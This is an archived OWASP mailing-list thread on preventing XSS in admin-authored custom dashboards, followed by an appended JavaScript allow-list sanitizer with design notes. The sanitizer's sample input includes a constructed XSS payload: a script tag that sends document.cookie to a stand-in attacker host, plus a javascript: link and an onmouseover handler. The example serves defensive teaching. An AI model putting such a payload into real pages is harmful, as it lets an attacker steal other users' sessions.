[Owasp-leaders] Help Required : Best Practices against XSS on custom UI creation

Dave Wichers dave.wichers at owasp.org
Mon Nov 28 14:49:31 UTC 2016

What language is the application written in? There are tools like AntiSamy
that reduce the attack surface in scenarios like this as you can define a
policy of what is and is not allowed, but ultimately, if you let the admin
put in javascript there isn't much you can do.


On Mon, Nov 28, 2016 at 8:24 AM, Dibyendu Sikdar <dibyendu.coder at gmail.com>

> Hi Experts,
> Recently I have come across some projects where the application allows the
> admin to code and create custom dashboard using html5, javascript and css.
> Now all the admins can have access to these dashboards. And just because
> it can allow js to be used, a rogue admin can put an xss payload in any of
> these dashboard and can perform malicious activities which can affect other
> admins.
> What are some best practices can you recommend here ?
> --
> *Thanks and Regards,*
> *Dibyendu Sikdar*
> *https://www.linkedin.com/in/dibsyhex*
> *@dibsyhex*
> *OWASP Project Leader *
> _______________________________________________
> OWASP-Leaders mailing list
> OWASP-Leaders at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-leaders
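The "define a policy of what is and is not allowed" approach Dave names, as an added example that is not part of the thread and not AntiSamy's own code or policy format: a small allow-list HTML sanitizer for the dashboard case. It only applies if the dashboards are restricted to markup; once admins are permitted to author JavaScript there is nothing to sanitize, and the remaining control is isolation rather than filtering. The tag list, attribute list, permitted schemes and base origin are constructed assumptions for illustration.

```javascript
// Added example, not code from the thread or from AntiSamy: a minimal
// allow-list HTML sanitizer in the AntiSamy "policy" style for the
// dashboard case. Output is rebuilt token by token from the policy, so
// anything the policy does not explicitly permit is dropped or emitted as
// escaped text. The policy, tag list and base origin are constructed
// assumptions for illustration.

const policy = {
  // tag -> attributes permitted on it; no script, style, iframe, object,
  // form, and no on* handlers anywhere.
  tags: {
    div: ["class"], span: ["class"], p: ["class"],
    h1: [], h2: [], b: [], i: [], ul: [], ol: [], li: [], br: [],
    a: ["href", "title"],
    img: ["src", "alt", "width", "height"],
  },
  urlAttrs: new Set(["href", "src"]),     // attributes that must carry a safe URL
  schemes: new Set(["http:", "https:"]),  // javascript:, data:, vbscript: rejected
  base: "https://dashboards.example.invalid/", // assumed app origin for relative URLs
};
const VOID = new Set(["br", "img"]);
const TAG_RE = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
const ATTR_RE = /([a-zA-Z][\w:-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

function escapeHtml(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
          .replace(/"/g, "&quot;").replace(/'/g, "&#39;");
}

// Parse with the WHATWG URL parser (the same one browsers use) and return the
// normalised form, so the scheme that was checked is the scheme the browser
// will act on ("  JaVaScRiPt:", "java\tscript:" etc. all normalise to javascript:).
function safeUrl(value) {
  let url;
  try { url = new URL(value.trim(), policy.base); } catch { return null; }
  return policy.schemes.has(url.protocol) ? url.href : null;
}

function sanitizeAttrs(tag, rawAttrs) {
  const allowed = policy.tags[tag];
  let out = "";
  for (const m of rawAttrs.matchAll(ATTR_RE)) {
    const name = m[1].toLowerCase();
    let value = m[2] ?? m[3] ?? m[4] ?? "";
    if (!allowed.includes(name)) continue;          // drops onclick, style, srcdoc, ...
    if (policy.urlAttrs.has(name)) {
      value = safeUrl(value);
      if (value === null) continue;                 // drop the attribute, keep the tag
    }
    out += ` ${name}="${escapeHtml(value)}"`;       // always re-quoted and escaped
  }
  return out;
}

function sanitizeHtml(input) {
  let out = "", last = 0;
  const open = [];                                  // stack used to emit balanced output
  for (const m of input.matchAll(TAG_RE)) {
    out += escapeHtml(input.slice(last, m.index));  // text between tags is escaped
    last = m.index + m[0].length;
    const closing = m[1] === "/", tag = m[2].toLowerCase(), attrs = m[3];
    // hasOwnProperty, not `in`: "<constructor>" would otherwise match an
    // inherited Object.prototype key.
    if (!Object.prototype.hasOwnProperty.call(policy.tags, tag)) continue; // tag dropped
    if (closing) {
      const i = open.lastIndexOf(tag);
      if (i === -1) continue;                       // stray close tag
      while (open.length > i) out += `</${open.pop()}>`;
    } else {
      out += `<${tag}${sanitizeAttrs(tag, attrs)}>`;
      if (!VOID.has(tag)) open.push(tag);
    }
  }
  out += escapeHtml(input.slice(last));
  while (open.length) out += `</${open.pop()}>`;    // close anything left open
  return out;
}

// Constructed sample of what a rogue admin might save as a "dashboard".
const sample = '<div class="widget" onmouseover="alert(document.cookie)">' +
  '<a href="javascript:alert(1)">Sales</a>' +
  '<script>fetch("https://evil.example/?c=" + document.cookie)</script></div>';
console.log(sanitizeHtml(sample));
```

Two points worth noting about the design. The contents of a removed element such as script are left behind as escaped, inert text rather than deleted, so the dashboard author sees what was rejected; a full policy engine can be configured to remove them instead. URL attributes are emitted in the parser's normalised form, not the author's original string, so that the scheme that passed the check is exactly the one the browser will see. This filtering only helps while dashboards are markup-only; if admins must be able to write JavaScript, the remaining option is to run each dashboard on its own origin (for example a sandboxed iframe), so that a rogue admin's script cannot reach other admins' sessions on the main application.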